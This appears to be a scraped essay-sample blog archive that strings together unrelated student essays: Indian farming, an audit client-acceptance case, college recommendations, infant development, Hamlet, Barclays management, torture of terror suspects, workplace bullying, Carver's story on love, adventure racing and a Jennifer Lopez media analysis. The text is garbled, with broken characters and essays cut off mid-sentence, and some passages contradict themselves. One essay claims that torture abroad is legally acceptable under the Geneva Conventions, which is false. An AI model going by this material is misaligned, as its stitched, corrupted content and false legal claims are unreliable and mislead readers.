Saturday, August 31, 2019

Problem faced by indian farmers and suggestions Essay

Earlier there was a problem for some credit for farmers, now it is easy to some extent. So the credit is not a problem for the farmers but after production there is, because of not having adequate storage facility some perishable vegetables farmers cannot store it for longer times. So the storage facility and the transportation facilities both should be in the modern line. Actually second thing is the price, price of the produce because whenever the farmer product the price now so low so sometimes it is not remunerative business for farmers. Particularly in fruits this thing happens much because if I grow grain crops then I can store for a longer time but for the fruit crops it is not possible for me. So I have to dispose it off in any market at any price or any rate. So marketing is sometimes a problem. So if both problem solves I think farmer have a good day in future. I am selling through the mandis, through the regulated markets I am selling through the APMC, the agriculture produce market committee in Gujarat. But here in this regular market also there is no say for farmers. Farmers have to stand up there, there is no facility available in the local market for grading and storing. Second thing in the present market also the dalals and wholesalers have their more say than farmers, that is the problem. Solution: According to me the solution could be – In the regulated market, the local market government should enhance the facility for storage as well as grading at the market levels so that our produce can be go for export also. There should be a platform for farmers to decide his price on that.

Friday, August 30, 2019

Ocean Manufacturing

The client acceptance process can be quite complex. Discuss five procedures an auditor should perform in determining whether to accept a client. Which of these five are required by auditing standards and identify the applicable standards?1. Obtain an understanding of the client's business and operations. Consideration should be given to reading available financial information regarding the prospective client such as annual reports, registration statements, Forms 10-K, other reports to regulatory agencies and income tax returns.2. Inquire as to the general reputation of high ranking employees, influential directors and shareholders, as well as the entity itself. Carefully consider any matters that may negatively reflect on management's integrity, ability and attitude. Such inquiries may be directed to the prospective client's bankers, legal counsel, underwriters, and others in the business community. Background checks obtained by investigative firms may also be useful.3. Consider mana gement's response to observations about or suggestions for improvements in internal controls made by the predecessor auditor and/or the internal auditor.4. Consider the composition and autonomy of the Board of Directors and the Audit Committee, including the number of independent outside directors.5. Communicate with the predecessor auditor in accordance with the provisions of Statement on Auditing Standards (SAS) No. 84 [AU315]. Inquiries should be directed to the integrity of management and the reasons for the change in auditor.The following situations should be carefully considered in assessing whether to accept a client: o There has been a disagreement with the previous auditor over accounting principles or practices; financial statement disclosures; auditing scope; or the Form 8-K discloses a reportable event as defined in Securities and Exchange Commission Regulation S-K. o The previous auditor resigned or declined to stand for re-election or there is no clear reason for the c essation of the client relationship. o Access to the predecessor auditor's working papers has been denied. Other CPA firms have declined to serve the prospective client. There appears to be evidence of â€Å"opinion shopping. â€Å"2. Return on Equity (ROE=Net profit after tax /Total Shareholders' Equity * 100) 2521/35469 x100 = 7. 11% Return on Assets (ROA=Net profit after tax / Total Assets * 100)2521/66820 x 100 = 3. 77  Ã‚  Unfavorable Assets to Equity (Total Assets / Total Shareholders' Equity) 66821/35469 = 1. 88  Ã‚   favorable Accounts Receivable Turnover (Sales / Account receivable) 104026/7936 = 13. 10 favorable Average Collection Period (Account receivable / Sales * 365) 7936104026 x 365 = 27. 4 favorable Inventory Turnover (Cost of sales / Inventory) 69177/10487 = 6. 6  Ã‚  Unfavorable Days in Inventory (Inventory / Cost of sales * 365) 10487/69177 x365= 44. 3  Ã‚  Favorable Debt Ratio (Total Liabilities / Total Assets)31352/66821 = 0. 47  Ã‚  Not available ( industry figures) Debt to Equity (Total Liabilities / Total Shareholders' Equity) 31353/35469 = 0. 88 Favorable Times Interest Earned (Profit before interest and tax / Interest expense) 6242/1474 = 4. 23  Ã‚  Favorable Current Ratio (Current assets / Current liabilities)27064/14118 =1. 2  Ã‚  favorable Profit Margin (Net Profit before interest and tax / Sales * 100) 6242/104026 x100 = 6. 00Unfavorable The comparison needs to be done for the audited accounts and since the audited accounts are available for 2001 and 2000 but the industry figures are available only for 2001 and 2002 we have to select the year 2001 for comparison. The accounts show that the company is healthy and the ratios are mainly favorable except that the company is not properly leveraged and this is leading to a loss of opportunities and a lower profit margin and lower return on equity. There are no grounds of objection emanating from the ratios and the company can be accepted for auditing.3. What non-financia l matters should be considered before accepting Ocean as a client? How important are these issues to the client acceptance decision? Why? In order to minimize the likelihood of association with a client whose management lacks integrity, Statement on Quality Control Standards No. 2, System of Quality Control for a CPA Firm's Accounting and Auditing Practice, (QC Section 20. 4) (applicable to auditing and accounting and review services) provides that â€Å"policies and procedures should be established for deciding whether to accept or continue a client relationship and to perform a specific engagement for that client (QC Section 20. 14)†, to minimize the likelihood of the specific policies and procedures established and the nature and extent to which they may be documented may vary significantly from firm to firm. Throughout the process, from initial consideration about accepting or continuing a client to issuance of an audit report, auditors are faced with risk.This risk can b e thought of as having three components: ? The entity's business risk – The risk that the entity will not survive or will not be profitable. ? The auditor's business risk – The risk to the auditor from association with the client, consisting of the risk of potential litigation costs and the related effect on the auditor's reputation and the risk of other costs (not related to litigation) such as the effects on fee realization. ? The auditor's audit risk – The risk that the auditor may unknowingly fail to appropriately modify his or her opinion on financial statements that are materially misstated.The following discussion highlights matters that a firm may wish to consider in connection with establishing policies and procedures for client acceptance and continuance. The extent to which a firm may choose to employ any of the following is, with the exception of certain procedures required by generally accepted auditing standards, largely a matter of professional ju dgment. The discussion of specific policies and procedures is intended to be thought-provoking and useful to a firm in assessing the particular client acceptance and continuance policies and procedures it may choose to employ in its practice.4a) Ocean wants Barnes and Fischer to aid in developing and improving their IT system. What are the advantages and disadvantages of having the same audit firm provide both auditing and consulting services? Given current rules on professional independence in the Joint Code of Professional Conduct, will Barnes and Fischer be able to help Ocean with their IT system and still provide a financial statement audit?No, given the current rules on professional independence in the Joint Code of Professional Conduct, Barnes and Fisher will not be able to help Ocean with heir IT system and still provide a financial statement audit. This appointment as an IT system consultant violates this rule: â€Å"Consider whether any financial interests or relationships exist that would impair the appearance of the firm's independence from the client and preclude its expression of an opinion on the entity's financial statements. The firm should consider Rule 101 of the AICPA Code of Professional Ethics. For clients that are public companies, the firm should also consider the requirements of the SEC â€Å". and also, Consider any potential conflicts of interest that could result from the acceptance of a client†4 b. As indicated in the case, one of the partners in another office has invested in a venture capital fund that owns shares of Ocean common stock. Would this situation constitute a violation of independence according to the Joint Code of Professional Conduct? Why or why not? The venture capital fund holds 50,000 shares of Ocean stock, currently valued at approximately $18 a share. This investment represents just over a half of one percent of the value of the fund's total holdings.The partner's total investment in the mutual fund is cu rrently valued at about $56,000. Since, the value of the investment represents just over one half percent of the value of the fund's total holdings, the influence of the partner is negligible, and in addition, the partner is located at a separate office so the company may go ahead with acceptance.5a)  Ã‚  Prepare a memo to the partner making a recommendation as to whether Barnes and Fischer should or should not accept Ocean Manufacturing, Inc as an audit client. Carefully justify your position in light of the information in the case.Include consideration of reasons both for and against acceptance and be sure to address both financial and non-financial issues to justify your recommendation Ocean should be accepted as a client for the company. Even though: A check on the background of Ocean's management revealed that five years ago Ocean's vice president of finance was charged with a misdemeanor involving illegal gambling on local college football games. Charges were later dropped i n return for Mr. Stevens' agreeing to pay a fine of $500 and perform 100 hours of community service. There were no other integrity problems found in the company.The various checks carried out in Ocean include:1. Entity's Business Risk o Management:– Engages in activities indicative of a lack of integrity.– Is prone to engage in speculative ventures or accept unusually high business risks.– Displays a poor attitude toward compliance with outside regulatory or legislative obligations.– Engages in complex transactions or innovative deals that make the determination of the effects on the financial statements difficult to assess or highly subjective.– Lacks a proven track record. Is evasive, uncooperative or abusive to the audit team.– APART FROM RELUCTANCE TO INTRODUCE US TO THE PREVIOUS AUDITORS ALL THE FACTORS WERE FOUND TO BE NEGATIVEThe Entity:– Has products that are new and unproven.– Depends on a limited number of customers o r suppliers.– Is experiencing a deteriorating financial condition or liquidity crisis.– Is subject to uncertainties that raise substantial doubt about its ability to continue as a going concern.– Operates in countries where business practices are questionable.– Has an inadequate capital base or is highly leveraged.– Is experiencing difficulty in meeting restrictive debt covenants.– Generates negative cash flows from operations but reports operating profits.– Has publicly traded debt outstanding that is below investment grade.– Is a low tier firm in an emerging or maturing industry where weak competitors are exiting the market.– Is subject to unpredictable changes in price and availability of product inputs that cause significant variance in profitability.– Is vulnerable to rapidly changing technology.– Is investing cash from short-term borrowings in long-term assets.INVESTIGATIONS SHOW THAT ALL THE ABOVE FA CTORS AT OCEAN ARE NEGATIVE o The Industry:– Is undergoing rapid change.– Is subject to high competition, market saturation, product obsolescence, or declining demand.– Has high operating leverage demonstrated by high fixed costs and low variable costs.– Is highly cyclical or counter cyclical.– Has a low entry barrier.– Is facing regulations that will adversely impact profitability throughout the industry.EXAMINATION OF INDUSTRY DETAILS AT LEXIS NEXIS SHOWS THAT NONE OF THE NEGATIVE TRENDS IN THE INDUSTRY ARE PRESENT2. Barnes and Fischer ‘s Business Risk o The entity is prone to a high number of lawsuits or controversies. o There are frequent changes in the entity's auditors. o The entity plans to engage in an initial public offering or use the financial statements to engage in a debt or equity offering. o The financial statements will be used in connection with an acquisition or disposal of a business or segment INVESTIGATIONS HAVE SH OWN THAT IN CASE OF THE PROSPECTIVE CLIENT NONE OF THE ABOVE MENTIONED RISKS ARE THERE FOR Barnes and Fischer .5. b. Prepare a separate memo to the partner briefly listing and discussing the five or six most important factors or risk areas that will likely affect how the audit is conducted if the Ocean engagement is accepted. Be sure to indicate specific ways in which the audit firm should tailor its approach based on the factors you identify. The risk areas in case of Ocean include;2. The company is under levered.3. The company is not getting loans in the market because of disrepute not know to us.4. There might be integrity issues related to the vice- president involved in gambling but kept underground and secret. The Barnes and Fischer should be vigilant on the activities of the main executives of Ocean.5. The percentage of profit earned by the company is lower than the industry norm. Barnes and Fischer should keep a close watch on the profit margin of the company and in case of anomalistic behavior should mention it in the auditor's report Barnes and Fischer should follow SAS No. 47, as amended, Audit Risk and Materiality in Conducting an Audit (AU Section 312), which provides guidance on the auditor's consideration of audit risk when planning and performing an audit of financial statements.Examples of factors that may increase audit risk include:o Operations that are dominated by a single individual.o Undue emphasis on achieving earnings per share; maintaining the market price of the company's stock; or meeting earnings projections.o Unreliable processes for making accounting estimates or questionable estimates by executives.o Unrealistic budget levels that encourage unrealistic objectives.o A high volume of significant year-end transactions.o Compensation based to a significant degree on reported earnings. o An unnecessarily complex corporate structure. Prior-year financial statements that were restated for correction of an error or irregularity.o Attemp ts by management to reduce the scope of Barnes and Fischer .o Substantial litigation involving the entity's business practices.o Material weaknesses or other reportable conditions in the internal control structure.o Significant and unusually complex related party transactions. o Affiliates that are unaudited or audited by others.o Management espouses aggressive accounting principles.o Understaffed accounting department or inexperienced personnel.Financial reports not prepared on a timely basis. Please note the lacunae in the question. First, the question does not mention the weights Barnes and Fischer intend to give financial measure and non-financial measures for accepting Ocean as the client. Second, the question does not mention what influence the partner in the ‘other' office has in the auditing of Barnes and Fischer. This is related to the policies of the auditors. Third, the question of there being advantages and disadvantages of appointing the same firm as auditor and c onsultant does not arise. Remember, the Enron scam!Fourth, the question is not clear if Barnes and Fischer have experience of auditing accounts of firms making small home appliances. Fifth, the question mention in one place that Ocean wants to make a public issue, on the other hand the company accounts are showing that the company is under leveraged, these two things are antithetical and Barnes and Fischer should have investigated why Ocean wants to go in for equity when Ocean should actually go in for debt. Still this is an excellent question in auditing. Please use the above guidelines and write an excellent answer. Ocean Manufacturing Barnes and Fischer, LLP| To:| Jane Hunter| From:| Susan Anderson, Elizabeth Lane, Chantal Murphy, Elizabeth Robinson| CC:| Dr. Cashell| Date:| 3/5/2013| Re:| Decision on Accepting Ocean Manufacturing as a client| | Recommendation: We recommend that we do not accept Ocean Manufacturing as a client. Justification:There were several issues we considered when making our recommendation:0Independence Violation0No experience in the industry0Can’t do consulting because SOX violation0Red flag with regard to contact to previous auditor0Significant Mgt.Turnover0Unethical behavior (illegal gambling)03 years ago received qualified opinion0Aggressively accounting to meet creditor’s requirements0New accounting system0Audit trails not kept in tactFirst, we considered possible GAAS and GAAP violations. When reviewing Ocean Manufacturing’s background information, we found that a partner in the Salt Lake City office owns shares in a venture fund which holds a private equity investm ent in Ocean common stock. This is an independence violation which goes against the second general standard of GAAS.Another GAAS violation could be considered because we have a background in the healthcare service industry and Ocean Manufacturing is in the appliance industry. Since we do not have training in this field, we would be violating the first general standard of GAAS. There is also a SOX violation because Ocean Manufacturing would like us to do consulting and help prepare for the IPO. They also would like us to work with their IT program. This goes against the rules of GAAP.Since they are getting ready to offer an IPO we would be faced with higher litigation risk. Ocean Manufacturing also has various management issues that have raised red flags. The company has experienced high management turnover, which could be an indication of how the company is run on a daily basis. When the vice-president of Ocean was approached to discuss the previous auditor, he was hesitant to talk about the previous audit firm. If a potential client is even hesitant to allow engagement with prior auditor, this is not usually a good sign.Also, when the client background check was conducted, it was discovered that the vice-president of finance was involved with illegal gambling in the past, which could be an indication of his lack of ethics. This behavior could carry over to unethical behavior in the company since the leaders set the tone of the company which in turn reflects a higher litigation risk. There were also issues with the company’s financial statements. Three years ago Ocean Manufacturing received a qualified report from their auditor.Ocean’s previous auditor told us their problems with Ocean primarily related to management reflecting their revenue and accruals aggressively in order meet creditors’ requirements and the complexity of Ocean’s new IT system. When reviewing their control systems, we noticed a few issues. Ocean Manufacturingâ⠂¬â„¢s audit trails were not kept intact due to system failures and errors. There are also system failures when it comes to their new accounting system. There are problems in inventory tracking and cost accumulation, receivable billing and aging, payroll tax deductions, payables, and balance sheet account classifications.This could also explain some of the aspects of the financial statements that appeared to be off compared to previous years. Ocean’s accounts receivable, accounts payable, and accrued expenses appear to be much greater than the changes in the year before. This could also be because of the aggressive accruing that was discussed earlier. In conclusion, we feel that the issues with auditing standards, management, and financial statements are good enough indications as to why we should not accept Ocean Manufacturing as a client. |

Thursday, August 29, 2019

The Dos and Donts of Guidance Counselor Recommendations

One of your greatest sources of information during the applications process, as well as throughout your high school experience, is your guidance counselor . Your guidance counselor can not only provide you with information about what colleges are best suited to you and give you helpful advice about requirements, financial aid, and other college-related matters, but also play a crucial role in the admissions process—providing you with a letter of recommendation. By now, you probably know that you need teachers to provide letters of recommendation on your behalf. (If you’re struggling to decide which of your teachers will write the best letters for you, check out our â€Å" What Makes a Good Recommendation Letter ?† post.) But why exactly do you need a letter of recommendation from your guidance counselor? Most schools ask for one to three teacher recommendations and one guidance counselor recommendation. In some cases, you may provide an additional letter , but you should only do so if you believe that letter can offer additional information that will contribute to your application. While the teacher recommendation provides insight on your abilities, strengths, and accomplishments as a student , the guidance counselor letter offers understanding about you in the context of your entire class. Since high schools vary significantly in terms of rigor, student body, and courses, admissions committees want to compare you to your classmates to provide context for grades and other academic accomplishments. For instance, if you are a mostly B student, but the average grade in your high school class is a C-, colleges are likely to understand that you are closer to the top than it might initially seem, and that your courses are particularly challenging. On the other hand, if you are a mostly A student, but so are the majority of your classmates, admission committees might see your high school as a grade inflator that easily hands out high marks, and will want to pay closer attention to your test scores and other application materials. Both your teacher and guidance counselor recommendations are very important in the admissions process; they simply provide the admissions committee with different aspects of your academic background to consider. Another key difference is that unlike with teacher recommendations, you cannot choose the person who will write your guidance counselor recommendation. It must be the guidance counselor you have been assigned. (Keep in mind that some high schools call this person by a different title, such as school counselor or academic advisor.) Estimating your chance of getting into a college is not easy in today’s competitive environment. Thankfully, with our state-of-the-art software and data, we can analyze your academic and extracurricular profile and estimate your chances. Our profile analysis tool can also help you identify the improvement you need to make to enter your dream school. Students in especially large high schools or class sizes may not know their guidance counselor very well, since he or she is responsible for advising so many students. Additionally, while your teachers only need to write letters for students they see regularly, your guidance counselor must write letters for an entire class, or large portion of a class if there are multiple counselors assigned to your high school. If this is the case for you, you might want to take the opportunity to reach out to your guidance counselor personally to chat with him or her about your goals, ambitions, academic work, and other aspects of your life. Some schools might already have prearranged meetings for students and counselors in place, but it never hurts to put in the extra time to build a strong relationship. Even if you don’t attend a large high school or already feel that your guidance counselor knows you well, you may still want to schedule a meeting to discuss factors that may influence your school report that you haven’t covered until now. Building a strong relationship with your guidance counselor is essential; if you want them to write a recommendation that shows off your strengths, they must know you well in order to best identify them. What you look like on paper is only part of the story; looking at your grades and honors may not convey the full story on what you hope to do in college and during your career, or what is most unique about you. Developing a strong relationship will also help you stand out among your classmates and allow your counselor to write a recommendation that is unique and personal. At the same time, remember to be courteous when communicating with your guidance counselor, and avoid coming across as overly demanding. They are likely responsible for advising many students, and may not always be available to meet with you one-on-one or respond to your requests immediately. Be respectful of your counselor’s time, and make the most of the sessions you do spend with them. In addition to setting up meetings with your guidance counselor, you should provide a resume or list of your classes and recommendations. This will give your recommender a clearer sense of your accomplishments so far and what your strengths and interests are. And of course, as with teachers, you should always thank your guidance counselors for their hard work throughout the process. But what if you are homeschooled? The application process tends to be a bit different for homeschooled students . Most colleges will offer special application instructions to homeschooled students, so be sure to investigate the admissions process for the schools to which you are applying thoroughly. In general, it is never a good idea to ask a parent or other relative for a letter of recommendation ; relatives are have inherent biases, and colleges want to see a more objective perspective. However, some colleges, such as MIT, explicitly make exceptions for parent recommendations in the case of homeschooled students. Be sure to do your research before ruling out this option. Depending on the particular college’s rules, an admissions committee may not separate recommendation types by teacher and guidance counselor, since you probably don’t have a guidance counselor. Therefore, you should think about the various adults in your life—coaches from athletic or academic teams, community services or religious leaders, or other types of mentors—and try to get multiple perspectives. For instance, consider asking a sports coach and a community service leader, rather than two coaches. If you have taken courses elsewhere, such as a college or academic program, the educators who taught you are good choices for providing an academic perspective to replace teacher recommendations, while a mentor or leader in another area might replace a guidance counselor recommendation. For more advice on applying to college as a homeschooled student, take a look at our â€Å" Homeschooled Student’s Guide to Applying to College † or â€Å" How Do Colleges Evaluate Homeschooled Students? † posts.

Wednesday, August 28, 2019

Physical Development in Infancy Essay Example | Topics and Well Written Essays - 1250 words

Physical Development in Infancy - Essay Example Infants grow and learn incredibly during their first five years. Parents and caretakers must be ready to provide active and intended care and attention to infants’ preschools years. Early learning at this stage must be considered to be of utmost importance since it forms the basis for future learning. In order for caregivers to provide proper and useful teachings to their young ones, it is imperative to understand child development. Every human being is unique developmentally and this makes development change a very basic truth in human growth. Universal principles of human development do exist but the fact remains that there are no two completely alike children. Differences among children are exhibited in the physical, social, emotional and cognitive patterns of growth. Children also show differences in their ways of interacting with the environment surrounding them, how they play, and their affection towards different things among many other factors. This means that some will show signs of happiness and energy most times while others may exhibit a personality of calmness all the time. Activity and quietness may also differ among different children. It is therefore important for caregivers to understand the patterns of development so as to be equipped to assist and offer attention to their children. This paper looks at the development of infancy from the physical point of view. Physical development refers to physical changes in the body. This entails changes in bone thickness, size, weight, gross motor, fine motor, vision, hearing, and perceptual development (Ruffin, 2009). According to Ruffin (2009), development means growth that happens in a child from the time of birth to adolescence. These changes happen in a sequence that is orderly in nature. This sequence involves emotional, physical and cognitive development. These changes occur in patterns that can be predicted depending with the age of the individual. They differ in timing

Tuesday, August 27, 2019

Discuss the possibilty that Hamlet never encountered the ghost of this Essay

Discuss the possibilty that Hamlet never encountered the ghost of this father, that the ghost was all a figment in the imagination of a troubled mind - Essay Example Making things worse, Claudius is now married to Hamlet’s mother. Trying to figure out whether the ghost is telling the truth or is instead a manipulation of the devil, Hamlet pretends to be insane in order to discover the truth, but there have been numerous critics who have claimed Hamlet is actually crazy. In fact, a ‘mock’ court case held to determine the answer to whether Hamlet was sane or insane resulted in a deadlocked jury (Vicini, 2007). While there are several good arguments that there is a definite method behind Hamlet’s madness, there are several ways in which Shakespeare leaves the question open. One of the areas of doubt is whether the ghost that Hamlet sees is real or if it is only a figment of his imagination. The state of Hamlet’s mind is thrown into doubt from the very beginning of the play, thereby opening up the question of whether the ghost is real or imaginary. Even this early in the play, Hamlet is seen to be a man divided. The first thing he says is not to anyone in particular but instead muttered under his breath to himself, â€Å"a little more than kin, and less than kind!† (I, ii, 65). These words indicate the level of disgust he has toward the actions of his mother and uncle, but has been used to indicate his insanity because he’s talking to himself. When he tells his uncle he is â€Å"too much in the sun† (I, ii, 67), he illustrates that he has a strong tendency to turn phrases so that they mean something other than what was intended. His tendency to always find a double meaning in things can be seen again when he responds to his uncle’s question about why he’s still wearing black. Instead of answering the question directly, he indica tes his uncle is watching him too closely already and that he does not appreciate being considered his uncle’s son. This ability to always find a double meaning in what is being said is itself a sign of insanity.

Monday, August 26, 2019

Leadership and Management Development Essay Example | Topics and Well Written Essays - 2250 words

Leadership and Management Development - Essay Example As the paper discusses  the dynamism in technology and the overall globalization are attributable to the leadership and management styles in today’s organizations, particularly the corporation under consideration. For instance, Barclays bank has an intensive structure of communication from a centralized point. The global operations of Barclays are monitored from a central location. This has been made possible by embracing technology in networking and programming. In fact, the bank’s management is able to monitor millions of transaction daily. This is one of the primary benefits of technology. This study observes that, Barclays bank embraces a considerable level of virtual management compared to physical. The bank has edged competitively in the banking and investment industries through apt leadership and management skills, which are in line with the latest technological trends.From the discussion it is clear that  Barclays bank’s leadership and management cons ist of numerous departments and sub-departments that act as the overall administration unit of the bank. Some researchers term it as the heart beat of the company. It oversees and coordinates all the activities of the bank in a daily basis. In fact, its absence literally implies absence of the bank’s transactions.  The primary function of the management and leadership team of any organization is to work to ensuring high level of alignment between the company’s structure and the attributed strategies intended for execution.... Some researchers term it as the heart beat of the company (LEES, 1992). It oversees and coordinates all the activities of the bank in a daily basis. In fact, its absence literally implies absence of the bank’s transactions. Consider the following structure. Courtesy of Mumford A. and Gold, J. (2006) Management Development: Strategies for Action, London, CIPD Management Strategy and structure alignment at Barclays bank The primary function of the management and leadership team of any organization is to work to ensuring high level of alignment between the company’s structure and the attributed strategies intended for execution. Alignment of the two instruments is fundamental in the overall realization of a firm’s objectives (MULLINS, 2010). For the case of Barclays bank, strict flow of information in both vertical and horizontal directions as illustrated in the management structure remains the core priority. It enables proper conveyance of information of emerging t rends in diverse sectors of the firm. Such information needs to be relayed frequently due the ever-dynamic business milieu (SCHEIN, 1989). Effective managers should apply informal managerial skills to ensure interactive culture with all the stakeholders to facilitate effective leadership that is characterized by inclusiveness. Management and leadership operations As depicted from the structure above, the Barclays bank’s leadership has become more challenging due to the global dynamism that the industry is facing today. The company has become more flexible to change, responsive and less structured (PERREN, & BURGOYNE, 2002). While the CEO’s have remained the ultimate authority, the bank continues to depend on

Torturing terrorist by the goverment Article Example | Topics and Well Written Essays - 750 words

Torturing terrorist by the goverment - Article Example Suspects of terrorism are expected to provide the government with intelligence information on the whereabouts of their gangs, sympathizers and financiers. However, to extract this information from them always become the problem. This is because most of these suspects are under oath to protect the activities of their groups. For example, most of them opt to commit suicide rather than having to be interrogated by the authorities. Concealing this information, therefore, renders a big blow to governments counter-terrorism activities. Proposals have for this reason been forwarded encouraging governments to use more force on the suspects and this involves the application of torture to the suspects. This, however, has human rights implications besides the expected outcomes. This means that in the face of the society, the human rights organizations and the international community, torturing terrorism suspects have pros and cons. Applying torture to terrorism suspects have advantages. First, torture to terrorism suspects has not been covered in the Geneva Convention report on the treatment of prisoners of war. Further, the convention only prohibits torture in the culprits own soil. When happening in another country, torture is thus legally acceptable. Secondly, treating terrorism with diplomacy only makes the situation worse. When the dignity of the suspects is respected as proposed by humanitarian organizations the terrorists are even more encouraged to make attacks. In addition, new members have no reproach joining the terror groups. This is as opposed to a torture situation in which case even those who have the intentions of joining such groups become discouraged. This slowly weakens the group and makes it unable to conduct attacks in future. Thirdly, the fight against terrorism often requires the people to make a choice between two evils. To use torture to compel disclosure of intelligent information,

Sunday, August 25, 2019

Human Resource management (Workplace Bullying) Essay

Human Resource management (Workplace Bullying) - Essay Example At a time when employee loyalty is an important aspect of organizational strategies, it wise that all organizations shun work place bullying to ensure that employees are committed to the long term plan of the organization and that they perform optimally to achieve the goals of goals of the organization. Research by McCormack, Djurkovic and Casmir (2014) proves that organizations that provide a healthy work environment for the employees profit from optimal work output and perform better than those that pay little attention to work behaviour. Therefore, organizations must design strategies to ensure that work place bullying is shunned to pave way for optimal employee performance. Although the term bullying is common in management, it is clear that it is broad and refers to different aspects of organizational behaviour. Bullying or mobbing refers to situations in which a worker is subjected to long-lasting, recurrent, and serious negative or hostile acts and behaviour that are annoying and oppressing. Evidently, there are various forms of work place bullying within organizations. McCormack, Djurkovic and Casmir (2014) identify few including threats of professional status, threat to personal standing, overwork, destabilization and underpayment as various forms of bullying within many organizations. Among many researchers, there seems to be a consensus that work place bullying as the abuse of power that subjects employees to psychological, emotional or physical torture during their duties in the work place (Namie, 2003: Pfeffer, 2007). Often, those who have more powers in the organization abuse those below them by the way they handle them or even communicate du ring normal duties. Researchers such as McDonald, Backstrom and Allegretto (2007) have paid attention to underpayment as one of the forms of bullying within modern organizations. While this may be controversial, it is clear that in the endeavour to minimize expenditures within the competitive business

Saturday, August 24, 2019

Is True Love Real or Just an Illusion Research Paper

Is True Love Real or Just an Illusion - Research Paper Example scientifically rigorous in their characterization of the concept, however they disagree on what constitutes love and to what extent the traditional concept of true love is the same today as it was in past generations. This essay considers these perspectives in regards to Raymond Carver’s short story and offers its own unique perspective on the concept of ‘true love’. Raymond Carver’s short story ‘What We Talk About, When We Talk about Love’ examines the concept of love from a number of angles. One such formulation is presented by Mel’s wife Terri. Terri describes a relationship she had with her former husband Ed who used to abuse her because he couldn’t gain total control over her. Later in the story Mel posits a different version of love wherein a senior citizen couple gets in a traffic accident and the husband is in despair because he is unable to turn his head to view his wife. While the story presents these concepts a different types of love, they actually function very similar in logically supporting their claims. These are examples where ‘true love’ is understood by its intensity of expression. That love is not a medical or scientific example, but is an intensity of feeling that is surfaces in things such as the example described. Throughout the conversation Nick and Laura remain passive participants and are in great part dominated by Mel. The story notes that Mel is a cardiologist -- that is, a doctor used to formulating medical prescriptions and categorizing human functions. It follows that he would be the most confident in overtly defining what ‘love is’. In a sense, Mel believes that love can be understood and defined through reason: love is passionate intensity; love is deep devotion, etc. When Nick and Laura respond to the question they nudge each other under the table and then Nick takes Laura’s hand and kisses it. This is an understanding of love that is not defined but felt. Nick and Laura are not able to define their

Friday, August 23, 2019

Critical Analysis of the Authenticity of Adventure Racers Identities Research Paper

Critical Analysis of the Authenticity of Adventure Racers Identities - Research Paper Example An examination of what it is that makes the identity of adventure racers in the sport authentic reveals that the characters involved in the sport usually depict a characteristic of resistance. This sport is self-sufficient, multidiscipline, multiday, non-stop, and it also involves a mixed gender team. This sport being a multiday sport requires that the racers master several outdoor skills. The racers are also required to develop skills on how to manage risks such as illness and injury. These are some of the factors that are seen to make the identity of adventure racers authentic in the sport. The racers are also required to get accustomed to harsh conditions such as the deprivation of sleep, extreme weather conditions, harsh terrains and weight loss (Brown and Eisenhardt, 1998). The distinctive Habitus theory and adventure racing This paper will use the distinctive Habitus theory to critically examine what makes adventure racers authentic in the sport. The Habitus theory will examine the embodied culture and link it with some of the new corporate cultures, and examine how they influence the authenticity of adventure racers identities. The analysis will be based on the concept of Pierre Bourdieu, which tends to be pivotal in the practice of authentic racing. According to this theory, adventure racing incorporates some schemes of disposition and these are some of the factors that make the identity of adventure racers authenti

Thursday, August 22, 2019

Jennifer Lopez Essay Example for Free

Jennifer Lopez Essay Using the video clip, the magazine article and the newspaper article, analyse how a positive image of a celebrity is presented through the different media. You should compare and contrast the different ways they are presented. I have been given an assignment to discuss a magazine article, a newspaper article and a video clip. I have chosen to discuss Jennifer Lopez. I will be discussing the magazine article first followed by the newspaper article and finally by the video clip. First of all I am going to discuss the picture in the magazine article, the picture we are given is in black white, which, is slightly a disadvantage when talking and discussing articles. The picture of Jennifer Lopez in the magazine article is covering more than half the page; the picture of Jennifer Lopez has been taken from such an angle so the viewers can only see one side of her face. Pictures such as this, which are taken from the side, are very popular. Viewers say they rather have a picture from the side of a person rather than a straight picture from the front. The picture has been enhanced and edited to show the best bit of Jennifers body. I. e. her buttocks. The picture of Jennifers body has been edited such as extra shadow has been placed on the picture of her body to give the look of a healthy and fit looking skin with a golden look, the shadow and enhancement make the curves of her slim and smooth body more attractive which she keeps talking about and attract more viewers. The picture enhances the buttocks with the frilly underwear she is wearing, she wears this to make her buttocks looks smaller as she thinks it is too large, this is one of the reasons she is not wearing a thong although many admirers and fans think her buttocks is the most desired part of Jennifer Lopezs body. The text in the magazine article of Jennifer Lopez is a main part of the magazine as it tells us what we the viewers and readers want to hear and see. The text although compared to other articles may be placed somewhere near the top of the page, this text has been brought down next to her buttocks as when readers read the text, where it quotes straight from the text, derriere(backside), you wouldnt to search for it as it has been correctly positioned so you can look straight over as you read the text. Her name Jennifer Lopez has not been placed in Capital Letters although people think of her as a sex symbol. The magazine article NEW do not seem to mind publishing J-Los age as some people prefer that as a private matter, nevertheless she has the sign of being number 1 on the side of the text which shows that she is a very high ranking lady and a title at the top saying she is (in this magazine) the sexiest woman at this time. The first line of the text in the magazine article is a quotation, which is supposedly from Jennifer Lopez herself. She says, I have a very curvaceous body and I like to accentuate that. She then goes on to say, To me its a beautiful thing. Quotation from anybody in an article is a very persuasive technique to pull new readers to get the interested; the public is pulled in to think like her, which is part of the repetition technique. The quotation, tells us she shows of her body and her beauty to he public. Showing the body can be a good technique in getting large amounts of new readers to get the interested. Repetition is brought in to the text even though it is a short piece of text, the article repeats on how her body has those beautiful curves yet they also decide to talk about her career and some of her personal life. The article brings in a short sentence when they say she married a wrong person such as P DIDDY. What was she thinking, this was quoted when they gave a remark over P DIDDY her ex-husband. This remark makes the male readers think you should have come to me instead. A rhetorical question is used, What was she thinking, this is used when the remarked her ex-husband P-DIDDY, this sometimes make the public think twice before they judge the article and Jennifer Lopez. The magazine article although very short gives a positive impression towards Jennifer Lopez especially at the talk of her body. Remember the magazine article can never have as much impact as the video, this is because the video has motion clips and sound to go with pictures as in the newspaper and the magazine article it is only one picture which may have been enhanced to give it an effect. The newspaper article shows the picture of Jennifer Lopez and her groom to be Ben Affleck. The title is shown as Jennifer Lopez: The Story. It gives an impression of Jennifer as if it were from the beginning. The first few lines of the text are lyrics from her solo song Jenny from the block, where it says, Dont be fooled by the rocks that she has got, these few words dont be fooled by the rocks that shes got, gives us an impression that she is extremely wealthy, the point of bringing these lyrics up is to pull reader to read this newspaper saying that this person is a wealthy person and that she has everything a girl would need. The nest few words are, shes still Jenny from the block, these few words important as they tell us that when she was at a younger age she was poor, may be not that poor, but with the riches she has now the words say she is still the same person she was say 20 years ago. Although she says she is it may not seem so, this is slightly a negative impact 